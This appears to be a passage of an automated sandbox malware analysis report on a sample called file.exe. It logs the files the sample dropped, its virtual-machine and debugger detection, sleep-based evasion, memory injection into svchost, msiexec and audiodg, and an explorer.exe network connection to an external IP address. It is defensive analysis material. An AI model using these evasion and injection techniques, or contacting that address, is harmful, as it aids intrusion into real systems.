          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l2-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\libcrypto-1_1.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\_hashlib.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\_ctypes.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\_lzma.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\select.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\_socket.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\python38.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\_bz2.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-util-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\unicodedata.pydJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-2-0.dllJump to dropped file
          Source: C:\Windows\System32\svchost.exeEvaded block: after key decisiongraph_2-772
          Source: C:\Windows\System32\msiexec.exeEvaded block: after key decisiongraph_8-776
          Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-1102
          Source: C:\Windows\System32\audiodg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-1046
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_17-16918
          Source: C:\Windows\System32\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_8-1048
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-1047
          Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-1045
          Source: C:\Windows\explorer.exeAPI coverage: 5.6 %
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeAPI coverage: 1.8 %
          Source: C:\Windows\System32\audiodg.exe TID: 7016Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\System32\audiodg.exe TID: 7016Thread sleep count: 296 > 30Jump to behavior
          Source: C:\Windows\System32\audiodg.exe TID: 7016Thread sleep time: -14800000s >= -30000sJump to behavior
          Source: C:\Windows\System32\audiodg.exe TID: 4476Thread sleep count: 52 > 30Jump to behavior
          Source: C:\Windows\System32\audiodg.exe TID: 4476Thread sleep time: -140400s >= -30000sJump to behavior
          Source: C:\Windows\System32\audiodg.exe TID: 6248Thread sleep count: 169 > 30Jump to behavior
          Source: C:\Windows\System32\audiodg.exe TID: 6248Thread sleep time: -1014000s >= -30000sJump to behavior
          Source: C:\Windows\System32\audiodg.exe TID: 7016Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 7036Thread sleep count: 2947 > 30Jump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 7036Thread sleep time: -147350000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 7036Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\System32\msiexec.exe TID: 7072Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\System32\msiexec.exe TID: 7072Thread sleep count: 1099 > 30Jump to behavior
          Source: C:\Windows\System32\msiexec.exe TID: 7072Thread sleep time: -54950000s >= -30000sJump to behavior
          Source: C:\Windows\System32\msiexec.exe TID: 7128Thread sleep count: 74 > 30Jump to behavior
          Source: C:\Windows\System32\msiexec.exe TID: 7128Thread sleep time: -199800s >= -30000sJump to behavior
          Source: C:\Windows\System32\msiexec.exe TID: 7072Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5016Thread sleep time: -234800s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3128Thread sleep time: -137000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7124Thread sleep time: -134000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5288Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5016Thread sleep time: -1362200s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe TID: 5300Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe TID: 6348Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
          Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3E85A0 FindFirstFileExW,FindClose,17_2_00007FF69F3E85A0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_00007FF69F3E79B0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F400B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00007FF69F400B84
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3E85A0 FindFirstFileExW,FindClose,18_2_00007FF69F3E85A0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F400B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_00007FF69F400B84
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,18_2_00007FF69F3E79B0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC9303C FindFirstFileExW,FindNextFileW,FindClose,18_2_00007FFDFFC9303C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC93280 FindFirstFileExW,FindNextFileW,FindClose,18_2_00007FFDFFC93280
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F6F50 GetSystemInfo,VirtualAlloc,VirtualAlloc,4_2_0E8F6F50
          Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
          Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
          Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
          Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 50000Jump to behavior
          Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 50000Jump to behavior
          Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
          Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
          Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
          Source: C:\Windows\explorer.exeThread delayed: delay time: 90000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000002.3078727847.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: svchost.exe, 00000002.00000002.3071197547.000001301D093000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMSAFD L2CAP [Bluetooth]RSVP UDPv6 Service Provider
          Source: explorer.exe, 00000004.00000003.2515139841.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000004.00000003.2515139841.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000004.00000002.3078727847.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000002.3070194848.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000004.00000002.3074143855.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.1849997060.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: svchost.exe, 00000002.00000002.3070446353.000001301D036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@4
          Source: explorer.exe, 00000004.00000000.1847603303.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000004.00000003.2515139841.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: svchost.exe, 00000002.00000002.3071036945.000001301D080000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.1849997060.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000004.00000002.3074143855.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1847603303.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000004.00000002.3070194848.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000004.00000002.3077534683.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000004.00000002.3070194848.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-858
          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-853
          Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-797
          Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-801
          Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-807
          Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-810
          Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_4-113124
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeAPI call chain: ExitProcess graph end nodegraph_5-804
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeAPI call chain: ExitProcess graph end nodegraph_5-798
          Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_7-799
          Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_7-807
          Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_7-812
          Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_8-810
          Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_8-801
          Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_8-813
          Source: C:\Windows\System32\audiodg.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A833120 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF63A833120
          Found API chain indicative of debugger detection
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_5-1041
          Source: C:\Users\user\Desktop\file.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_0-1096
          Source: C:\Windows\System32\audiodg.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_7-1040
          Source: C:\Windows\System32\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_2-1039
          Source: C:\Windows\System32\msiexec.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_8-1041
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A833120 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF63A833120
          Source: C:\Windows\explorer.exeCode function: 4_2_0E916624 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_0E916624
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F7CF0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,4_2_0E8F7CF0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A831050 LoadLibraryA,GetProcAddress,0_2_00007FF63A831050
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A832ED0 GetProcessHeap,HeapFree,0_2_00007FF63A832ED0
          Source: C:\Windows\System32\audiodg.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4CF348 InitializeCriticalSectionAndSpinCount,SetUnhandledExceptionFilter,4_2_0F4CF348
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4CF398 SetLastError,SetUnhandledExceptionFilter,4_2_0F4CF398
          Source: C:\Windows\explorer.exeCode function: 4_2_10D8F398 SetLastError,SetUnhandledExceptionFilter,4_2_10D8F398
          Source: C:\Windows\explorer.exeCode function: 4_2_10D8F348 InitializeCriticalSectionAndSpinCount,SetUnhandledExceptionFilter,4_2_10D8F348
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF69F3F9924
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3EC62C SetUnhandledExceptionFilter,17_2_00007FF69F3EC62C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF69F3EC44C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF69F3EBBC0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF69F3F9924
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3EC62C SetUnhandledExceptionFilter,18_2_00007FF69F3EC62C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF69F3EC44C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FF69F3EBBC0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC90F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FFDFFC90F20
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC6A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FFDFFC6A184
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE13316810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FFE13316810
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE13315DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FFE13315DF8
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE133169F8 SetUnhandledExceptionFilter,18_2_00007FFE133169F8
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE1333D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FFE1333D414
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE148B4A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FFE148B4A34
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE148B5054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FFE148B5054
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Benign windows process drops PE files
          Source: C:\Windows\explorer.exeFile created: 4A64.tmp.x.exe.4.drJump to dropped file
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 176.111.174.140 80Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 protect: page execute and read and writeJump to behavior
